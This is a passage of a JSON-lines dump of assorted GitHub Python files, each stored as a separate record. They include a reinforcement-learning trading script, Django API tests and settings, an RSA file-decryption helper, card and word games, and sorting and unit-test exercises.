'Volume'],\n self.balance\n ])\n return np.array(self.state)\n\n\n# Calculate reward\n def get_reward(self):\n self.punish_value += self.net_worth * 0.00001\n if self.no_of_orders > 1 and self.order_placed_now:\n if self.trades[-1]['type'] == \"buy\":\n reward = self.trades[-2]['total']*self.trades[-2]['current_price'] - self.trades[-2]['total']*self.trades[-1]['current_price']\n reward -= self.punish_value\n self.punish_value = 0\n self.trades[-1][\"Reward\"] = reward\n return reward\n elif self.trades[-1]['type'] == \"sell\":\n reward = self.trades[-1]['total']*self.trades[-1]['current_price'] - self.trades[-2]['total']*self.trades[-2]['current_price']\n reward -= self.punish_value\n self.trades[-1][\"Reward\"] = reward\n self.punish_value = 0\n return reward\n else:\n return 0 - self.punish_value\n\n\n def render(self, visualize=False):\n if visualize:\n time = self.df.loc[self.current_step, 'Time']\n open = self.df.loc[self.current_step, 'Open']\n close = self.df.loc[self.current_step, 'Close']\n high = self.df.loc[self.current_step, 'High']\n low = self.df.loc[self.current_step, 'Low']\n volume = self.df.loc[self.current_step, 'Volume']\n\n # Render the environment 
to the screen\n            self.visualization.render(time, open, high, low, close, volume, self.net_worth, self.trades)\n\ndef addIndicators(df):\n    # Add Simple Moving Average (SMA) indicators\n    df[\"sma7\"] = SMAIndicator(close=df[\"Close\"], window=7, fillna=True).sma_indicator()\n    df[\"sma25\"] = SMAIndicator(close=df[\"Close\"], window=25, fillna=True).sma_indicator()\n    df[\"sma99\"] = SMAIndicator(close=df[\"Close\"], window=99, fillna=True).sma_indicator()\n\n    # Add Bollinger Bands indicator\n    indicator_bb = BollingerBands(close=df[\"Close\"], window=20, window_dev=2)\n    df['bb_bbm'] = indicator_bb.bollinger_mavg()\n    df['bb_bbh'] = indicator_bb.bollinger_hband()\n    df['bb_bbl'] = indicator_bb.bollinger_lband()\n\n    # Add Parabolic Stop and Reverse (Parabolic SAR) indicator\n    indicator_psar = PSARIndicator(high=df[\"High\"], low=df[\"Low\"], close=df[\"Close\"], step=0.02, max_step=2, fillna=True)\n    df['psar'] = indicator_psar.psar()\n\n    # Add Moving Average Convergence Divergence (MACD) indicator\n    df[\"MACD\"] = macd(close=df[\"Close\"], window_slow=26, window_fast=12, fillna=True)\n\n    # Add Relative Strength Index (RSI) indicator\n    df[\"RSI\"] = rsi(close=df[\"Close\"], window=14, fillna=True)\n\n    return df\n\n\ndef test_random(env, train_episodes=50, visualize=False):\n    average_net_worth = 0\n    for episode in range(train_episodes):\n        state = env.reset()\n\n        while True:\n            env.render(visualize)\n\n            action = np.random.randint(3, size=1)[0]\n            # env.step() returns four values; the original unpacked only three, which raises a ValueError\n            state, reward, done, _ = env.step(action)\n\n            if env.current_step == env.end_step or done:\n                average_net_worth += env.net_worth\n                print(\"net_worth:\", env.net_worth)\n                break\n\n    print(\"average_net_worth:\", average_net_worth/train_episodes)\n\ndef test_model(env, model, visualize=True, test_episodes=2):\n\n    average_net_worth = 0\n    for episode in range(test_episodes):\n        state = env.reset()\n        while True:\n            env.render(visualize)\n            action, _ = model.predict(state)\n            state, reward, done, _ = env.step(action)\n            if env.current_step == env.end_step or done:\n                average_net_worth += env.net_worth\n                print(\"net_worth:\", episode, env.net_worth)\n                break\n\n    print(\"average {} episodes agent net_worth: {}\".format(test_episodes, average_net_worth/test_episodes))\n\ndf = pd.read_pickle('1 year data')\ndf = df.iloc[:, :6]\ndf.columns = ['Time', 'Open', 'High', 'Low', 'Close', 'Volume']\ndf = df.sort_values('Time')\ndf = df.set_index('Time')\ndf = df.astype(float)\n# df = addIndicators(df)\n\n\nlookback_window_size = 120\ntrain_df = df[:-14400]\ntest_df = df[-14400:] # 10 days\n\ntrading_cycle = 240\nrand = random.randint(0, 14400-trading_cycle*2)\ntest_df = df[rand:rand+2*trading_cycle]\n\n\ntrain_env = CustomEnv(train_df, lookback_window_size=lookback_window_size)\ntest_env = CustomEnv(test_df, lookback_window_size=lookback_window_size, trading_cycle=trading_cycle)\n\n# model = PPO(\"MlpPolicy\", train_env, verbose=1, tensorboard_log=log_path)\nmodel = PPO.load(save_path, env=train_env)\n\nmodel.learn(total_timesteps=1000000)\nmodel.save(save_path)\ntest_model(test_env, model)\n\n# test_random(train_env, train_episodes=10, visualize=True)\n\n\n#510217\n#5,09,976","repo_name":"kush888/RL","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":10679,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"18911282566","text":"import pytest\nfrom rest_framework import status\nfrom rest_framework.reverse import reverse\n\n\n@pytest.mark.django_db\n@pytest.mark.parametrize(\"url\", [reverse(\"subjects-list\")])\ndef test_subject_list_response(url, user_client):\n    \"\"\"\n    Ensure we can connect to the subjects list URL.\n    \"\"\"\n    assert user_client.get(url).status_code == status.HTTP_200_OK\n\n\n@pytest.mark.django_db\ndef test_post_subject_success(create_valid_user, user_client):\n    \"\"\"\n    Ensure we can add a new subject.\n    \"\"\"\n    response = user_client.post(\n        \"/api/v1/subjects/\",\n        {\"title\": \"test\", \"description\": \"test test test\"},\n    )\n    assert response.status_code == status.HTTP_201_CREATED\n\n\n@pytest.mark.django_db\ndef test_subject_error_response(user_client):\n    \"\"\"\n    Ensure we get a 404 error when requesting a non-existent subject URL.\n    \"\"\"\n    response = user_client.get(\"/api/v1/subjects/1/get-404\")\n    assert response.status_code == status.HTTP_404_NOT_FOUND\n\n\n@pytest.mark.django_db\ndef test_post_subject_failure(create_valid_user, user_client):\n    \"\"\"\n    Ensure we cannot add a subject with an empty title.\n    \"\"\"\n    response = user_client.post(\n        \"/api/v1/subjects/\",\n        {\"title\": \"\", \"description\": \"test test test\"},\n    )\n    assert response.status_code == status.HTTP_400_BAD_REQUEST\n\n\n@pytest.mark.django_db\ndef test_post_uniqueness(create_valid_user, user_client):\n    \"\"\"\n    Ensure we can't add a duplicate subject.\n    \"\"\"\n    response = user_client.post(\n        \"/api/v1/subjects/\",\n        {\n            \"title\": \"Python core\",\n            \"description\": \"Introduction to python\",\n        },\n    )\n    assert response.status_code == status.HTTP_201_CREATED\n\n    response = user_client.post(\n        \"/api/v1/subjects/\",\n        {\n            \"title\": \"Python core\",\n            \"description\": \"Introduction to python\",\n        },\n    )\n    assert response.status_code == status.HTTP_400_BAD_REQUEST\n\n\n@pytest.mark.django_db\ndef test_subject_lectures_response(\n    user_client, create_valid_lecture, create_second_valid_lecture\n):\n    \"\"\"\n    Ensure we get the lectures list for one subject.\n    \"\"\"\n    lecture = create_valid_lecture\n    create_second_valid_lecture\n\n    response = user_client.get(f\"/api/v1/subjects/{lecture.subject.id}/lectures/\")\n\n    assert response.status_code == status.HTTP_200_OK\n","repo_name":"vladhoi/labs-management","sub_path":"app/tests/subjests/test_views.py","file_name":"test_views.py","file_ext":"py","file_size_in_byte":2313,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"10822154109","text":"def proverka(m):\n    n='бвгджзйклмнпрстфхцчшщБВГДЖЗЙКЛМНПРСТФХЦЧШЩ'\n    c='ауоыиэяюёеАУОЫИЭЯЮЁЕ'\n    a=0\n    s=0\n    for i in m:\n        if i in n:\n            a+=1\n        if i in c:\n            s+=1\n    return f'The number of vowels is {s}, the number of consonants is {a}'\nprint(proverka(input()))","repo_name":"Yarik20o1/Domashka","sub_path":"Функции/Функция 5.py","file_name":"Функция 5.py","file_ext":"py","file_size_in_byte":441,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"40243412971","text":"# -*- coding: utf-8 -*-\nimport rsa\ndef rsa_decrypt(message):\n\tmessage_str = rsa.decrypt(message,privkey).decode()\n\treturn message_str\n\nwith open('./rsa_private_key.pem' ,'r') as f:\n\tprivkey = rsa.PrivateKey.load_pkcs1(f.read().encode())\n\nf1=open('encrypt_message.txt','rb')\t# the ciphertext is binary, so read it as bytes\ntext=f1.read()\ntext1 = rsa_decrypt(text)\n#print(text1)\nsep=text1.find('.txt')\t# use find() to locate the boundary between the title and the body\n\ntitle=text1[:sep+4]\t# slice out the title string\n#print(title)\ncontent=text1[sep+4:]\t# slice out the body string\n#print(content)\n\nwith open(title, \"w\") as f2:\n\tf2.write(str(content))\n","repo_name":"xiaopeng-whu/socket-buffer_overflow","sub_path":"2017301510036-王泽鹏-2020网络安全考试/server/decrypt_file.py","file_name":"decrypt_file.py","file_ext":"py","file_size_in_byte":604,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"3826047839","text":"words = [\n\"cannon\",\n\"drawer\",\n\"current\",\n\"belief\",\n\"psychotic\",\n\"need\",\n\"unbiased\",\n\"tame\",\n\"breath\",\n\"brake\",\n\"stare\",\n\"screw\",\n\"doll\",\n\"hill\",\n\"soda\",\n\"elfin\",\n\"wicked\",\n\"vacation\",\n\"squeamish\",\n\"amuse\",\n\"crayon\",\n\"record\",\n\"check\",\n\"befitting\",\n\"lace\",\n\"connect\",\n\"halting\",\n\"quiet\",\n\"growth\",\n\"star\",\n\"alcoholic\",\n\"smoke\",\n\"numerous\",\n\"paper\",\n\"hard\",\n\"reach\",\n\"imperfect\",\n\"sea\",\n\"glib\",\n\"match\",\n\"wasteful\",\n\"hellish\",\n\"grubby\",\n\"secretary\",\n\"coil\",\n\"aloof\",\n\"breath\",\n\"hanging\",\n\"search\",\n\"like\",\n\"coach\",\n\"pat\",\n\"impolite\",\n\"reject\",\n\"thick\",\n\"ink\",\n\"songs\",\n\"island\",\n\"raise\",\n\"first\",\n\"shaggy\",\n\"wacky\",\n\"blot\",\n\"lyrical\",\n\"plastic\",\n\"boast\",\n\"fresh\",\n\"unsuitable\",\n\"stretch\",\n\"ethereal\",\n\"pan\",\n\"street\",\n\"shaky\",\n\"fall\",\n\"male\",\n\"art\",\n\"glass\",\n\"scarf\",\n\"crib\",\n\"prevent\",\n\"inject\",\n\"verdant\",\n\"servant\",\n\"amount\",\n\"temper\",\n\"vagabond\",\n\"riddle\",\n\"compete\",\n\"confused\",\n\"easy\",\n\"shoe\",\n\"birth\",\n\"unwieldy\",\n\"detailed\",\n\"knowledge\",\n\"agreement\",\n\"limit\",\n\"examine\",\n\"cause\",\n\n]","repo_name":"SuzanDewitz/hangman-for-all","sub_path":"words.py","file_name":"words.py","file_ext":"py","file_size_in_byte":986,"program_lang":"python","lang":"hr","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"22972206222","text":"import random\n\nclass Card:\n    def __init__(self, value, type):\n        self.value = value\n        self.type = type\n\n    def __str__(self):\n        signs = '♠♥♣♦'\n        card = str(self.value)\n        if self.value == 1:\n            card = 'A'\n        if (self.value == 13):\n            card = 'K'\n        if (self.value == 12):\n            card = 'Q'\n        if (self.value == 11):\n            card = 'J'\n\n        return card+signs[self.type]\n    def __repr__(self):\n        # __repr__ duplicated __str__ verbatim; delegate instead\n        return self.__str__()\n\nclass Deck:\n    def __init__(self):\n        self.cards = [Card(i,j) for i in range(1,14) for j in range(0,4)]\n\n    def __str__(self):\n        return str(self.cards)\n\n    def shuffle(self):\n        random.shuffle(self.cards)\n\n    def deal(self):\n        top = self.cards[0]\n        self.cards.pop(0)\n        return top\n\ndef is_win(hand, dhand):\n    # a hand wins if it did not bust and either the dealer busted or it outscored the dealer\n    player = sum([x.value for x in hand])\n    dealer = sum([x.value for x in dhand])\n    return player <= 21 and (dealer > 21 or player > dealer)\ndef main():\n    pile = Deck()\n    pile.shuffle()\n    hand = []\n    hand += [pile.deal(), pile.deal()]\n    dhand = []\n    dhand += [pile.deal(), pile.deal()]\n    if (sum([x.value for x in hand]) == 21):\n        print(\"You win!\")\n    print(\"Hand: \" + str(hand))\n    ans = input(\"Would you like a card? (y/n): \")\n    while (ans != 'y' and ans != 'n'):\n        ans = input(\"Enter y for yes and n for no: \")\n    if ans == 'y':\n        hand += [pile.deal()]\n        if (sum([x.value for x in dhand]) < 18):\n            dhand += [pile.deal()]\n        print(\"Hand: \" + str(hand))\n    while (sum([x.value for x in hand]) < 21 and ans != 'n'):\n        ans = input(\"Would you like a card? (y/n): \")\n        while (ans != 'y' and ans != 'n'):\n            ans = input(\"Enter y for yes and n for no: \")\n        if ans == 'y':\n            hand += [pile.deal()]\n            print(\"Hand: \" + str(hand))\n        if (sum([x.value for x in dhand]) < 18):\n            dhand += [pile.deal()]\n    if (is_win(hand,dhand)):\n        print(\"You win!\")\n        print(\"Your hand:\", hand)\n        print(\"Dealer's hand:\", dhand)\n    else:\n        print(\"You lose!\")\n        print(\"Your hand:\", hand)\n        print(\"Dealer's hand:\", dhand)\n\nif __name__ == '__main__':\n    main()\n","repo_name":"ab235/4schoolers1","sub_path":"hw/blackjack/blackjack.py","file_name":"blackjack.py","file_ext":"py","file_size_in_byte":2487,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"35580131315","text":"from armarx_control.utils.pkg import get_armarx_package_data_dir\nfrom armarx_control.config.njoint_controllers.taskspace_impedance import TaskspaceImpedanceControllerConfig\nfrom icecream import ic  # ic() is used below but was never imported; it comes from the icecream package\n\n\njson_file = get_armarx_package_data_dir(\"armarx_control\") / \"controller_config/NJointTaskspaceImpedanceController/default.json\"\nconfig = TaskspaceImpedanceControllerConfig().from_json(str(json_file))\nic(config)\nconfig_aron_ice = config.to_aron_ice()\nic(config_aron_ice)\nconfig_py = TaskspaceImpedanceControllerConfig().from_aron_ice(config_aron_ice)\nic(config_py)\n\n","repo_name":"markusgrotz/python3-armarx","sub_path":"armarx_control/test/test_aron.py","file_name":"test_aron.py","file_ext":"py","file_size_in_byte":540,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"40925656214","text":"import os\nimport sentry_sdk\nimport sys\nimport dotenv\n\nfrom datetime import timedelta\nfrom sentry_sdk.integrations.django import DjangoIntegration\nfrom os.path import join\n\nTESTING = sys.argv[1:2] == ['test']\n\nROOT_DIR = os.path.dirname(os.path.dirname(os.path.dirname(os.path.abspath(__file__))))\n\nif not TESTING:\n    dotenv.read_dotenv(ROOT_DIR)\n\nBASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))\n\nSITE_URL = os.getenv('SITE_URL', 'http://localhost:8000')\n\n\nINSTALLED_APPS = (\n    'django.contrib.auth',\n    'django.contrib.contenttypes',\n    'django.contrib.sessions',\n    'django.contrib.messages',\n    'django.contrib.staticfiles',\n    'jet',\n    'django.contrib.admin',\n    # Third party apps\n    'rest_framework', # utilities for rest apis\n    'rest_framework.authtoken', # token authentication\n    'django_filters', # for filtering rest endpoints\n    'django_rest_passwordreset', # for reset password endpoints\n    'drf_yasg', # swagger api\n    'easy_thumbnails', # image lib\n    'social_django', # social login\n    'corsheaders', # cors handling\n    'django_inlinecss', # inline css in templates\n    'django_summernote', # text editor\n    'django_celery_beat', # task scheduler\n    'djmoney', # money object\n    'health_check',\n    'health_check.db', # stock Django health checkers\n    'health_check.cache',\n    'health_check.storage',\n    'health_check.contrib.migrations',\n    'health_check.contrib.celery_ping', # requires celery\n    # Your apps\n    'src.notifications',\n    'src.users',\n    'src.social',\n    'src.files',\n    'src.common',\n    # Third party optional apps\n    # app must be placed somewhere after all the apps that are going to be generating activities\n    # 'actstream', # activity stream\n)\n\n# https://docs.djangoproject.com/en/2.0/topics/http/middleware/\nMIDDLEWARE = (\n    'django.middleware.security.SecurityMiddleware',\n    'django.contrib.sessions.middleware.SessionMiddleware',\n    'corsheaders.middleware.CorsMiddleware',\n    
'django.middleware.common.CommonMiddleware',\n 'django.middleware.csrf.CsrfViewMiddleware',\n 'django.contrib.auth.middleware.AuthenticationMiddleware',\n 'django.contrib.messages.middleware.MessageMiddleware',\n 'django.middleware.clickjacking.XFrameOptionsMiddleware',\n 'social_django.middleware.SocialAuthExceptionMiddleware',\n)\n\nSECRET_KEY = os.getenv('DJANGO_SECRET_KEY', '#p7&kxb7y^yq8ahfw5%$xh=f8=&1y*5+a5($8w_f7kw!-qig(j')\nALLOWED_HOSTS = [\"*\"]\nROOT_URLCONF = 'src.urls'\nWSGI_APPLICATION = 'src.wsgi.application'\n\n# Email\nEMAIL_BACKEND = os.getenv('EMAIL_BACKEND', 'django.core.mail.backends.smtp.EmailBackend')\nEMAIL_HOST = os.getenv('EMAIL_HOST', 'localhost')\nEMAIL_PORT = os.getenv('EMAIL_PORT', 1025)\nEMAIL_FROM = os.getenv('EMAIL_FROM', 'noreply@somehost.local')\n\n# Celery\nBROKER_URL = os.getenv('BROKER_URL', 'redis://redis:6379')\nCELERY_RESULT_BACKEND = os.getenv('CELERY_RESULT_BACKEND', 'redis://redis:6379')\n\nADMINS = ()\n\n# Sentry\nsentry_sdk.init(dsn=os.getenv('SENTRY_DSN', ''), integrations=[DjangoIntegration()])\n\n# CORS\nCORS_ORIGIN_ALLOW_ALL = True\n\n# CELERY\nCELERY_ACCEPT_CONTENT = ['application/json']\nCELERY_TASK_SERIALIZER = 'json'\nCELERY_RESULT_SERIALIZER = 'json'\nCELERY_TIMEZONE = 'UTC'\n\n# Postgres\nDATABASES = {\n 'default': {\n 'ENGINE': 'django.db.backends.postgresql',\n 'NAME': os.getenv('DB_NAME'),\n 'USER': os.getenv('DB_USER'),\n 'PASSWORD': os.getenv('DB_PASSWORD'),\n 'HOST': os.getenv('DB_HOST', 'db'),\n 'PORT': os.getenv('DB_PORT'),\n }\n}\n\n# General\nAPPEND_SLASH = True\nTIME_ZONE = 'UTC'\nLANGUAGE_CODE = 'en-us'\n# If you set this to False, Django will make some optimizations so as not\n# to load the internationalization machinery.\nUSE_I18N = False\nUSE_L10N = True\nUSE_TZ = True\nLOGIN_REDIRECT_URL = '/'\n\n# Static files (CSS, JavaScript, Images)\n# https://docs.djangoproject.com/en/2.0/howto/static-files/\nSTATIC_ROOT = os.path.normpath(join(os.path.dirname(BASE_DIR), 'static'))\nSTATICFILES_DIRS = []\nSTATIC_URL = '/static/'\nSTATICFILES_FINDERS = (\n 'django.contrib.staticfiles.finders.FileSystemFinder',\n 'django.contrib.staticfiles.finders.AppDirectoriesFinder',\n)\n\n# Media files\nMEDIA_ROOT = join(os.path.dirname(BASE_DIR), 'media')\nMEDIA_URL = '/media/'\n\n# Headers\nUSE_X_FORWARDED_HOST = True\nSECURE_PROXY_SSL_HEADER = ('HTTP_X_FORWARDED_PROTO', 'https')\n\nTEMPLATES = [\n {\n 'BACKEND': 'django.template.backends.django.DjangoTemplates',\n 'DIRS': STATICFILES_DIRS,\n 'APP_DIRS': True,\n 'OPTIONS': {\n 'context_processors': [\n 'django.template.context_processors.debug',\n 'django.template.context_processors.request',\n 'django.contrib.auth.context_processors.auth',\n 'django.contrib.messages.context_processors.messages',\n 'social_django.context_processors.backends',\n 'social_django.context_processors.login_redirect',\n ],\n },\n },\n]\n\n# Set DEBUG to False as a default for safety\n# https://docs.djangoproject.com/en/dev/ref/settings/#debug\nDEBUG = os.getenv('DJANGO_DEBUG', False) == 'True'\n\n# Password Validation\n# https://docs.djangoproject.com/en/2.0/topics/auth/passwords/#module-django.contrib.auth.password_validation\nAUTH_PASSWORD_VALIDATORS = [\n {\n 'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',\n },\n {\n 'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',\n },\n {\n 'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',\n },\n {\n 'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',\n },\n]\n\n# 
Logging\nLOGGING = {\n 'version': 1,\n 'disable_existing_loggers': False,\n 'formatters': {\n 'django.server': {\n '()': 'django.utils.log.ServerFormatter',\n 'format': '[%(server_time)s] %(message)s',\n },\n 'verbose': {'format': '%(levelname)s %(asctime)s %(module)s %(process)d %(thread)d %(message)s'},\n 'simple': {'format': '%(levelname)s %(message)s'},\n },\n 'filters': {\n 'require_debug_true': {\n '()': 'django.utils.log.RequireDebugTrue',\n },\n },\n 'handlers': {\n 'django.server': {\n 'level': 'INFO',\n 'class': 'logging.StreamHandler',\n 'formatter': 'django.server',\n },\n 'console': {'level': 'DEBUG', 'class': 'logging.StreamHandler', 'formatter': 'simple'},\n 'mail_admins': {'level': 'ERROR', 'class': 'django.utils.log.AdminEmailHandler'},\n },\n 'loggers': {\n 'django': {\n 'handlers': ['console'],\n 'propagate': True,\n },\n 'django.server': {\n 'handlers': ['django.server'],\n 'level': 'INFO',\n 'propagate': False,\n },\n 'django.request': {\n 'handlers': ['mail_admins', 'console'],\n 'level': 'ERROR',\n 'propagate': False,\n },\n 'django.db.backends': {'handlers': ['console'], 'level': 'INFO'},\n },\n}\n\n# Custom user app\nAUTH_USER_MODEL = 'users.User'\n\n# Social login\nAUTHENTICATION_BACKENDS = (\n 'social_core.backends.facebook.FacebookOAuth2',\n 'social_core.backends.twitter.TwitterOAuth',\n 'src.users.backends.EmailOrUsernameModelBackend',\n 'django.contrib.auth.backends.ModelBackend',\n)\nfor key in ['GOOGLE_OAUTH2_KEY', 'GOOGLE_OAUTH2_SECRET', 'FACEBOOK_KEY', 'FACEBOOK_SECRET', 'TWITTER_KEY', 'TWITTER_SECRET']:\n exec(\"SOCIAL_AUTH_{key} = os.environ.get('{key}', '')\".format(key=key))\n\n# FB\nSOCIAL_AUTH_FACEBOOK_SCOPE = ['email']\nSOCIAL_AUTH_FACEBOOK_PROFILE_EXTRA_PARAMS = {'fields': 'id, name, email'}\nSOCIAL_AUTH_FACEBOOK_API_VERSION = '5.0'\n\n# Twitter\nSOCIAL_AUTH_TWITTER_SCOPE = ['email']\n\nSOCIAL_AUTH_GOOGLE_OAUTH2_SCOPE = ['email', 'profile']\nSOCIAL_AUTH_ADMIN_USER_SEARCH_FIELDS = ['username', 'first_name', 'email']\n# If this is not set, PSA constructs a plausible username from the first portion of the\n# user email, plus some random disambiguation characters if necessary.\nSOCIAL_AUTH_USERNAME_IS_FULL_EMAIL = True\nSOCIAL_AUTH_PIPELINE = (\n 'social_core.pipeline.social_auth.social_details',\n 'social_core.pipeline.social_auth.social_uid',\n 'social_core.pipeline.social_auth.auth_allowed',\n 'social_core.pipeline.social_auth.social_user',\n 'social_core.pipeline.user.get_username',\n 'social_core.pipeline.social_auth.associate_by_email',\n 'social_core.pipeline.user.create_user',\n 'social_core.pipeline.social_auth.associate_user',\n 'social_core.pipeline.social_auth.load_extra_data',\n 'social_core.pipeline.user.user_details',\n)\n\nSOCIAL_AUTH_TWITTER_PIPELINE = (\n 'social_core.pipeline.social_auth.social_details',\n 'social_core.pipeline.social_auth.social_uid',\n 'social_core.pipeline.social_auth.auth_allowed',\n # 'social_core.pipeline.social_auth.social_user',\n 'src.common.social_pipeline.user.social_user',\n 'social_core.pipeline.user.get_username',\n 'social_core.pipeline.social_auth.associate_by_email',\n 'social_core.pipeline.user.create_user',\n 'social_core.pipeline.social_auth.associate_user',\n 'social_core.pipeline.social_auth.load_extra_data',\n 'social_core.pipeline.user.user_details',\n 'src.common.social_pipeline.user.login_user', # login correct user at the end\n)\n\nSOCIAL_AUTH_LOGIN_REDIRECT_URL = '/complete/twitter/'\n\nTHUMBNAIL_ALIASES = {\n 'src.users': {\n 'thumbnail': {'size': (100, 100), 'crop': True},\n 
'medium_square_crop': {'size': (400, 400), 'crop': True},\n        'small_square_crop': {'size': (50, 50), 'crop': True},\n    },\n}\n\n# Django Rest Framework\nREST_FRAMEWORK = {\n    'DEFAULT_PAGINATION_CLASS': 'rest_framework.pagination.LimitOffsetPagination',\n    'DEFAULT_FILTER_BACKENDS': ['django_filters.rest_framework.DjangoFilterBackend', 'rest_framework.filters.OrderingFilter'],\n    'PAGE_SIZE': int(os.getenv('DJANGO_PAGINATION_LIMIT', 18)),\n    'DATETIME_FORMAT': '%Y-%m-%dT%H:%M:%S.%fZ',\n    'DEFAULT_RENDERER_CLASSES': (\n        'rest_framework.renderers.JSONRenderer',\n        'rest_framework.renderers.BrowsableAPIRenderer',\n    ),\n    'DEFAULT_PERMISSION_CLASSES': [\n        'rest_framework.permissions.IsAuthenticated',\n    ],\n    'DEFAULT_AUTHENTICATION_CLASSES': (\n        'rest_framework.authentication.SessionAuthentication',\n        'rest_framework_simplejwt.authentication.JWTAuthentication',\n    ),\n    'DEFAULT_THROTTLE_CLASSES': [\n        'rest_framework.throttling.AnonRateThrottle',\n        'rest_framework.throttling.UserRateThrottle',\n        'rest_framework.throttling.ScopedRateThrottle',\n    ],\n    'DEFAULT_THROTTLE_RATES': {'anon': '100/second', 'user': '1000/second', 'subscribe': '60/minute'},\n    'TEST_REQUEST_DEFAULT_FORMAT': 'json',\n}\n\n# JWT configuration\nSIMPLE_JWT = {\n    'ACCESS_TOKEN_LIFETIME': timedelta(minutes=60),\n    'REFRESH_TOKEN_LIFETIME': timedelta(days=1),\n    'ROTATE_REFRESH_TOKENS': False,\n    'BLACKLIST_AFTER_ROTATION': True,\n    'UPDATE_LAST_LOGIN': False,\n    'ALGORITHM': 'HS256',\n    'SIGNING_KEY': SECRET_KEY,\n    'VERIFYING_KEY': None,\n    'AUDIENCE': None,\n    'ISSUER': None,\n    'AUTH_HEADER_TYPES': ('Bearer',),\n    'AUTH_HEADER_NAME': 'HTTP_AUTHORIZATION',\n    'USER_ID_FIELD': 'id',\n    'USER_ID_CLAIM': 'user_id',\n    'AUTH_TOKEN_CLASSES': ('rest_framework_simplejwt.tokens.AccessToken',),\n    'TOKEN_TYPE_CLAIM': 'token_type',\n    'JTI_CLAIM': 'jti',\n    'SLIDING_TOKEN_REFRESH_EXP_CLAIM': 'refresh_exp',\n    'SLIDING_TOKEN_LIFETIME': timedelta(minutes=5),\n    'SLIDING_TOKEN_REFRESH_LIFETIME': timedelta(days=1),\n}\n\n# summernote configuration\nSUMMERNOTE_CONFIG = {\n    'summernote': {\n        'toolbar': [\n            ['style', ['style']],\n            ['font', ['bold', 'underline', 'clear']],\n            ['fontname', ['fontname']],\n            ['color', ['color']],\n            ['para', ['ul', 'ol', 'paragraph', 'smallTagButton']],\n            ['table', ['table']],\n            ['insert', ['link', 'video']],\n            ['view', ['fullscreen', 'codeview', 'help']],\n        ]\n    }\n}\n\nDEFAULT_AUTO_FIELD = 'django.db.models.AutoField'\n","repo_name":"Vivify-Ideas/python-django-drf-boilerplate","sub_path":"src/config/common.py","file_name":"common.py","file_ext":"py","file_size_in_byte":12192,"program_lang":"python","lang":"en","doc_type":"code","stars":118,"dataset":"github-code","pt":"61"} +{"seq_id":"13509585023","text":"\nlista = [2,3,5,2,2,1,2,3,12]\nprint(lista)\ndef counting_sort(lista):\n    N = len(lista)\n    M = max(lista) + 1\n    out = [0] * N\n    count = [0] * M\n\n    # count every element (the original loop started at index 1 and skipped the first item)\n    for i in range(N):\n        count[lista[i]] += 1\n    print(count)\n\n    for i in range(1, M):\n        count[i] += count[i-1]\n\n    t = N - 1\n    while t >= 0:\n        out[count[lista[t]]-1] = lista[t]\n        count[lista[t]] -= 1\n        t -= 1\n\n    for i in range(0, N):\n        lista[i] = out[i]\n\ncounting_sort(lista)\nprint(lista)\n'''\n print(out)\nx = counting_sort(lista)\nprint(x)\n\nthe input list\nan index list sized to the maximum value of the input list\na zeroed counting array of the same size, used to count the repetitions in the input\nonce the repetitions of the input are counted in the counting array, each position's value is added to the previous one (i = i + (i-1))\n \"\"\"\nfor j in range(0, M+1):\n    k = count[j]\n    i = 0\n    while(k > 0):\n        if k == 0:\n            break\n        out[i] = j\n        print(out)\n\n        k -= 1\n\"\"\"\n\n '''\n\"\"\"\nthis version ran:\ndef countingSort(arr):\n    size = len(arr)\n    output = [0] * size\n    N = max(arr) + 1\n\n    # count array initialization\n    count = [0] * N\n\n    # storing the count of each element\n    for m in range(0, size):\n        count[arr[m]] += 1\n\n    # storing the cumulative count\n    for m in range(1, N):\n        count[m] += count[m - 1]\n\n    # place the elements in output array after finding the index of each element of original array in count array\n    m = size - 1\n    while m >= 0:\n        output[count[arr[m]] - 1] = arr[m]\n        count[arr[m]] -= 1\n        m -= 1\n\n    for m in range(0, size):\n        arr[m] = output[m]\n\ndata = [2,3,5,2,2,1,2,3,12]\ncountingSort(data)\nprint(\"Sorted Array: \")\nprint(data)\n\"\"\"","repo_name":"thiagoclrss/sort-algorithms","sub_path":"countingSort.py","file_name":"countingSort.py","file_ext":"py","file_size_in_byte":1750,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"22358044258","text":"#!/usr/bin/python3\n\"\"\"testing the base\"\"\"\nimport unittest\nfrom models.base_model import BaseModel\nimport re\nimport datetime\n\n\nclass test_BaseModel(unittest.TestCase):\n    \"\"\"tests for BaseModel class #3\"\"\"\n\n    def setUp(self):\n        self.a = BaseModel()\n        self.b = BaseModel()\n\n    def tearDown(self):\n        del self.a\n        del self.b\n\n    def test_existance(self):\n        \"\"\"test for existence of variables\"\"\"\n        # print(\"\\nIn existance\")\n        m = \"\"\n        for k in self.a.__dict__:\n            m = m + \" \" + k\n        i = re.search('id', m)\n        k = re.search('created_at', m)\n        j = re.search('updated_at', m)\n        self.assertIsNotNone(i)\n        self.assertIsNotNone(k)\n        self.assertIsNotNone(j)\n\n    def test_format(self):\n        \"\"\"test str format\"\"\"\n        # print(\"\\nIn format\")\n        \"\"\"check format of str output\"\"\"\n        self.assertRegex(self.a.__str__(), r'\\[.*\\]\\s+\\(.*\\)\\s+\\{.*\\}')\n\n    def test_id(self):\n        \"\"\"test id format\"\"\"\n        # print(\"\\nIn id\")\n        \"\"\"check uuid format\"\"\"\n        self.assertRegex(self.a.id, r'\\w{8}-\\w{4}-\\w{4}-\\w{4}-\\w{12}')\n        \"\"\"check id randomness, compare ids\"\"\"\n 